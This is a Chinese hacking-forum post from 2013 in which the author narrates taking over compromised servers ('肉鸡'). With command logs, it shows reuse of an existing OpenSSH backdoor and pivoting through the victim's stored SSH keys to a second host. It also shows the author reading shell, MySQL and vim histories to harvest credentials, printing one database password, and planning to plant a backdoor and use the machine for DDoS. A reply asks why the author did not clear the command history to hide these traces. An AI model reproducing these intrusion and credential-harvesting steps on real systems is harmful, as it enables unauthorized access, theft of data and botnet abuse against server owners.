切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
384 上主机上线请注意[复制链接]
发表于 2013-1-1 15:06:54 | 显示全部楼层 |!read_mode!
近来的一个肉鸡。。偶尔看到 登录了上去 发现SSH BACKDOOR 有记录 #364 持续后门 openssh backdoor(http://www.3g-sec.com/thread-1059-1-1.html





IP估计他做了HOSTS





密码帐号都给出来了 链接
然后我没输入密码久链接了


  1. root@vps40:/usr/local/lib# ssh root@dghost
  2. Warning: the RSA host key for 'dghost' differs from the key for the IP address '1XXX61XXXX71.59'
  3. Offending key for IP in /root/.ssh/known_hosts:22
  4. Matching host key in /root/.ssh/known_hosts:25
  5. Are you sure you want to continue connecting (yes/no)? yes
  6. Last login: Fri Dec 14 00:00:35 2012 from XXXXXXXX
  7. -bash: __rvm_add_to_path: command not found
  8. [root@localhost ~]#
复制代码


做了米吃认证? #369 SSH aotu login    http://www.3g-sec.com/thread-1106-1-1.html


看了下果然!


  1. [root@localhost ~]# exit
  2. logout
  3. Connection to dghost closed.
  4. root@vps40:/usr/local/lib# ls /root/.ssh/
  5. authorized_keys  config  id_rsa  id_rsa.pub  known_hosts  known_hosts.old
  6. root@vps40:/usr/local/lib#
复制代码


查看他记录关于SSH的如下


  1. root@vps40:~/.ssh# history | grep ssh
  2.    64  ssh-copy-id dghost
  3.    93  cat /etc/init.d/ssh
  4.   133  ssh-copy-id hb
  5.   191  ssh dghost
  6.   192  ssh-keygen -f "/home/muzik/.ssh/known_hosts" -R dghost
  7.   194  ssh dghost
  8.   195  ssh-keygen -f "/root/.ssh/known_hosts" -R dghost
  9.   196  ssh dghost
  10.   197  ssh-keygen
  11.   198  ssh-copy-id dghost
  12.   501  cd .ssh/
  13.   511  ssh 0cf9ahhk@dghost
  14.   512  ssh root@dghost
  15.   522  ssh root@dghost
  16.   523  ls /root/.ssh/
  17.   529  cd .ssh/
  18.   538  history | grep ssh
复制代码


发现另外一个用户 /home/muzik/

查看记录


  1. root@vps40:/home/muzik# cat .bash_history  | more   
复制代码

发现他用 rsync


  1. rsync -avzP root@dghost:/home/backup/db/daily/tb_prod/daily_tb_prod_2012-12-10_1
复制代码

dghost已经拿到了 不然可以传个木马上去 不过这位神牛用的是RUBY。。。 貌似没RUBY BACKDOOR老肉鸡没看的了 看新肉鸡

  1. root@vps40:/home/muzik# ssh dghost
  2. 和谐。。
  3. [root@localhost ~]# free -m
  4.              total       used       free     shared    buffers     cached
  5. Mem:          7869       7317        552          0        110       4450
  6. -/+ buffers/cache:       2757       5112
  7. Swap:         7999        428       7571
复制代码

8G内存
  1. [root@localhost ~]# fdisk -l

  2. Disk /dev/sda: 500.1 GB, 500107862016 bytes
  3. Disk /dev/mapper/VolGroup-lv_home: 437.5 GB, 437503655936 bytes
复制代码

1TB硬盘
  1. [root@localhost ~]# cat /proc/cpuinfo | grep name
  2. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
  3. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
  4. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
  5. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
  6. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
  7. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
  8. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
  9. model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
复制代码

8线程CPU拿来D 九区狗最爽了 我的最爱
看了下SSH登录记录不活跃
  1. [root@localhost .ssh]# cat known_hosts
  2. localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA352C3vyrcIc2ezHiBaPmxumv/DviF1L3Qayr/sPW95pxiP+dIS6QUul56N3ArKwhFsemB7lBMZacH59JCkV7XRXV5ofeMP4ukJBZ/0HjruEC00rLI93Ly8Wlyf0q0PO6jVNCOMMBSfQWVzem/szbqTdRipHzJEjz+vDFnsp1tBB5747QD3fMbkVp2TTpxff1VTvrhiD5+EU+KDRgFUrvkAmDO/gAthjHAGSvKqZoRD8e6FMZqHKvJ27j+wU3mqb61+f3r2a7zCvHHtRFrCXlN3t3kaNg5O3kjL/wQK1peRBgmPXdOidm9osJq4xnIJFpmh2YWvBNxvALG0P/xim/Cw==
复制代码

看了下MYSQL记录 找个个密码
  1. [root@localhost ~]# cat .mysql_history
  2. ---省字
  3. create user 'muzik'@'localhost' identified by 'angela00';
  4. ---省字
  5. [root@localhost ~]#
复制代码

看了下VIM记录找到了许多SH文件
  1. [root@localhost ~]# cat .viminfo | grep conf
  2. :e config/cs.properties
  3. '5  216  0  /etc/automysqlbackup/myserver.conf
  4. '9  63  0  /etc/automysqlbackup/automysqlbackup.conf
  5. -'  216  0  /etc/automysqlbackup/myserver.conf
  6. -'  208  0  /etc/automysqlbackup/myserver.conf
  7. -'  73  0  /etc/automysqlbackup/myserver.conf
  8. -'  10  24  /usr/src/snda-cloud-storage-python-tool-0.1.1/config/cs.properties
  9. -'  63  0  /etc/automysqlbackup/automysqlbackup.conf
  10. -'  23  0  /etc/automysqlbackup/automysqlbackup.conf
  11. -'  1  0  /etc/automysqlbackup/myserver.conf
  12. -'  1  0  /etc/automysqlbackup/automysqlbackup.conf
  13. -'  29  0  /etc/nginx/nginx.conf
  14. -'  34  1  /etc/nginx/nginx.conf
  15. -'  30  8  /etc/nginx/nginx.conf
  16. -'  2  0  /etc/nginx/nginx.conf
  17. -'  9  11  /etc/nginx/sites-enabled/default.conf
  18. -'  10  8  /etc/nginx/sites-enabled/default.conf
  19. -'  1  0  /etc/nginx/sites-enabled/default.conf
  20. -'  1  0  /etc/nginx/nginx.conf
  21. -'  42  6  /etc/sysctl.conf
  22. -'  1  0  /etc/sysctl.conf
  23. -'  30  0  /etc/redis.conf
  24. -'  53  0  /etc/redis.conf
  25. -'  137  0  /etc/redis.conf
  26. -'  1  0  /etc/redis.conf
  27. > /etc/automysqlbackup/myserver.conf
  28. > /usr/src/snda-cloud-storage-python-tool-0.1.1/config/cs.properties
  29. > /etc/automysqlbackup/automysqlbackup.conf
  30. > /etc/nginx/nginx.conf
  31. > /etc/nginx/sites-enabled/default.conf
  32. > /etc/sysctl.conf
  33. > /etc/redis.conf
  34. [root@localhost ~]#
复制代码

从中找到MYSQL密码 在配置里面 不帖出来了发现以NGINX运行
  1. [root@localhost /]# ps -ef | grep nginx
  2. muzik     2133  8346  0 Dec13 ?        00:00:05 nginx: worker process                  
  3. muzik     2134  8346  0 Dec13 ?        00:00:09 nginx: worker process   
复制代码

找到他绑定域名的配置
  1. [root@localhost sites-enabled]# ls
  2. default.conf  php.qjks  rails.jxjw  rails.ndrc  rails.tb
复制代码

查看SSH记录的另外一台
  1. root@vps40:/usr/local/lib# ssh hb   
  2. ssh: connect to host hb port 22: Connection refused
复制代码

发现链接不了
ping有反映
  1. root@vps40:/usr/local/lib# ping hb
  2. PING hb (118.244.X.192) 56(84) bytes of data.
  3. 64 bytes from hb (118.244.X.192): icmp_req=1 ttl=108 time=210 ms
  4. 64 bytes from hb (118.244.X.192): icmp_req=2 ttl=108 time=211 ms
复制代码

nmap扫描无结果不看了 登录7CPU那台装上后门 继续等待上主机上线请注意



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2015-4-8 13:38:26 | 显示全部楼层

发表于 2015-7-1 13:20:55 | 显示全部楼层
再linux运行命令,为什么不使用history -c 清楚记录?醉了

代码区

GMT+8, 2019-11-13 03:29

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部